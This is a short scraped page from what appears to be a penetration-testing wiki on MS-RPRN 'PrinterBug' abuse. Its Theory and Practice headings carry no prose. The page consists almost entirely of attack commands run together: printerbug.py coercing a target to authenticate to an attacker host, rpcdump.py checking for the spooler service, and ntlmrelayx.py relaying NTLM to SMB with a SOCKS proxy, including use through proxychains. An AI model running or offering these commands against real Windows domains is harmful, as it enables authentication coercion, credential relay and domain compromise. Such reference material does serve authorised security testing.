MS-RPRN abuse (PrinterBug)
Theory
Practice
printerbug.py 'DOMAIN'/'USER':'PASSWORD'@'TARGET' 'ATTACKER HOST'rpcdump.py $TARGET | grep -A 6 "spoolsv"ntlmrelayx.py -t smb://$TARGET -socks
proxychains printerbug.py -no-pass 'DOMAIN'/'USER'@'TARGET' 'ATTACKER HOST'Resources
Last updated
Was this helpful?